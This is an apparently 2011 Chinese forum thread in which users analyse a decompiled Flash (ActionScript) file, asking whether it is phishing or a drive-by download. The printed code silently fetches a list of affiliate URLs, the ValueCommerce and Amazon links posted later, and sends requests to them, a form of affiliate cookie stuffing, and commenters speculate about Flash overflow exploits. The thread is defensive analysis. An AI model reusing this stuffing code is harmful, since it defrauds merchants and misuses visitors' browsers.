求分析一段代码，是钓鱼的还是挂马的？

stick · 发表于 2011-5-15 23:51:20

google和firefox貌似只会分析出恶意的js代码
swf挂马，就是利用老版本flash空间的漏洞，构造带shellcode的字符串，在调用某个函数的时候溢出执行代码，多半是download and excute

nanashi · 发表于 2011-5-15 23:55:54

提示: 作者被禁止或删除内容自动屏蔽

wdlth · 发表于 2011-5-16 00:01:28

package custom_fla
{
import flash.display.*;
import flash.events.*;
import flash.net.*;
import flash.text.*;
dynamic public class MainTimeline extends MovieClip
{
public var swfLocation:Array;
public var imageArea:MovieClip;
public var swfDirectory:String;
public var imageLoader:Loader;
public var output_main:TextField;
public function MainTimeline()
{
addFrameScript(0, this.frame1);
return;
}// end function
public function imageLoaded(event:Event) : void
{
this.imageArea.addChild(this.imageLoader);
return;
}// end function
public function imageLoading(event:ProgressEvent) : void
{
return;
}// end function
function frame1()
{
this.swfLocation = this.loaderInfo.url.split("/");
this.swfDirectory = this.loaderInfo.url.substr(0, this.loaderInfo.url.length - this.swfLocation[(this.swfLocation.length - 1)].length);
this.bgimg();
this.output_main.text = this.output_main.text + "\n" + "Start stuffer";
return;
}// end function
public function getaff()
{
var affLoader:URLLoader;
var _affurl:String;
var _trackref:String;
var onLoaded:Function;
onLoaded = function (event:Event) : void
{
var keyStr:String;
var valueStr:*;
var evt:* = event;
var strSplit:* = affLoader.data.split("&&&&&");
try
{
var _loc_3:int = 0;
var _loc_4:* = strSplit;
while (_loc_4 in _loc_3)
{
keyStr = _loc_4[_loc_3];
valueStr = String(strSplit[keyStr]);
output_main.text = output_main.text + "\n URL: " + valueStr;
stuff(valueStr);
}
stuff("http://www.google.com");
}
catch (error:Error)
{
trace("error in loading");
}
return;
}// end function
;
var affRequest:* = new URLRequest(this.swfDirectory + "getaff.php");
affLoader = new URLLoader();
var affVariables:* = new URLVariables();
affRequest.method = URLRequestMethod.GET;
affRequest.data = affVariables;
affLoader.addEventListener(Event.COMPLETE, onLoaded);
affLoader.load(affRequest);
return;
}// end function
public function stuff(param1)
{
var stlink:* = param1;
this.output_main.text = this.output_main.text + "\n Stuff this url: " + stlink;
var stuffRequest:* = new URLRequest(stlink);
var stuffLoader:* = new URLLoader();
var stuffVariables:* = new URLVariables();
try
{
sendToURL(stuffRequest);
}
catch (e:Error)
{
}
return;
}// end function
public function loadImage(param1:String) : void
{
this.imageLoader = new Loader();
this.imageLoader.load(new URLRequest(param1));
this.imageLoader.contentLoaderInfo.addEventListener(ProgressEvent.PROGRESS, this.imageLoading);
this.imageLoader.contentLoaderInfo.addEventListener(Event.COMPLETE, this.imageLoaded);
return;
}// end function
public function track()
{
var trackLoader:URLLoader;
var onLoaded2:Function;
onLoaded2 = function (event:Event) : void
{
var _loc_2:* = trackLoader.data.split("&");
var _loc_3:* = _loc_2[1].split("=");
var _loc_4:* = _loc_3[1];
output_main.text = output_main.text + "\n" + trackLoader.data;
if (_loc_4 == "proceed")
{
output_main.text = output_main.text + "\n Stuff";
getaff();
}
else
{
output_main.text = output_main.text + "\n Do not stuff";
}
return;
}// end function
;
var trackRequest:* = new URLRequest(this.swfDirectory + "track.php");
trackLoader = new URLLoader();
var trackVariables:* = new URLVariables();
trackRequest.method = URLRequestMethod.GET;
trackRequest.data = trackVariables;
trackLoader.addEventListener(Event.COMPLETE, onLoaded2);
trackLoader.load(trackRequest);
return;
}// end function
public function bgimg()
{
var imgLoader:URLLoader;
var onLoaded4:Function;
onLoaded4 = function (event:Event) : void
{
loadImage(imgLoader.data);
track();
return;
}// end function
;
var imgRequest:* = new URLRequest(this.swfDirectory + "getimg.php");
imgLoader = new URLLoader();
var imgVariables:* = new URLVariables();
imgRequest.method = URLRequestMethod.GET;
imgRequest.data = imgVariables;
imgLoader.addEventListener(Event.COMPLETE, onLoaded4);
imgLoader.load(imgRequest);
return;
}// end function
}
}

复制代码

nanashi · 发表于 2011-5-16 00:04:41

提示: 作者被禁止或删除内容自动屏蔽

qiqi13245 · 发表于 2011-5-16 00:11:56

貌似是java语言。。

wdlth · 发表于 2011-5-16 00:15:45

getaff.php的代码是

http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=877212733&vcptn=shpg%2Fp%2FCddioIIDHa82DOm_UXiASQU6sLY-&vc_url=http%3A%2F%2Fshopping.yahoo.co.jp%2F&&&&&http://**azon.co.jp/gp/redirect.html?ie=UTF8&location=http%3A%2F%2F**azon.co.jp%2F&tag=fujittchi-22&linkCode=ur2&camp=247&creative=1211&&&&&http://www.google.com

复制代码

Value Commerce——按交易量收取报酬的广告模式，应该是个刷流量之类的，注意可能会spam或者变恶意网站。

stick · 发表于 2011-5-16 00:18:07

imgLoader.load(imgRequest);
在swf构造http请求，那么shellcode应该是由getimg.php输出
大体就是，旧版本的flash控件在载入image对象的时候可能会溢出
就是挂马，否则也是间谍软件

诱惑这么大看你咯，我估计你做游戏主题的

stick · 发表于 2011-5-16 00:20:08

16#导出getimg.php的内容了也，如果只是加载广告代码而已，应该无事的

nanashi · 发表于 2011-5-16 00:29:25

提示: 作者被禁止或删除内容自动屏蔽

nanashi · 发表于 2011-5-16 00:58:34

提示: 作者被禁止或删除内容自动屏蔽

		自动登录	找回密码
密码			注册

nanashi nanashi 当前离线积分 3193	12^# 楼主\| 发表于 2011-5-15 23:55:54 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
nanashi nanashi 当前离线积分 3193
	回复支持反对举报

nanashi nanashi 当前离线积分 3193	14^# 楼主\| 发表于 2011-5-16 00:04:41 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
nanashi nanashi 当前离线积分 3193
	回复支持反对举报

nanashi nanashi 当前离线积分 3193	19^# 楼主\| 发表于 2011-5-16 00:29:25 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
nanashi nanashi 当前离线积分 3193
	回复支持反对举报

nanashi nanashi 当前离线积分 3193	20^# 楼主\| 发表于 2011-5-16 00:58:34 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
nanashi nanashi 当前离线积分 3193
	回复支持反对举报

[疑问] 求分析一段代码，是钓鱼的还是挂马的？

浏览过的版块